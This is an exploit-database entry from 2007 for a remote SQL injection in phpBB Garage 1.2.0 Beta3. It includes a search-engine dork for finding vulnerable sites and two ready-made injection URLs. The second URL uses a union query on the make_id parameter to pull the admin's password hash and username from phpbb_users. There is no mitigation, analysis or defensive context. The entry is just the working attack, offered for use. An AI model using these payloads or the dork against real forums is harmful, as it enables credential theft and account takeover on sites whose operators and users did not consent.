phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability
# Published : 2007-12-03
# Author : maku234
# Previous Title : Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability
# Next Title : Snitz Forums 2000 Active.asp Remote SQL Injection Vulnerability

Title: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability
Dork:  "Powered By phpBB Garage 1.2.0"

Author:  maku234
E-Mail: maku234@gmail.com



garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*

# www.Syue.com [2007-12-03]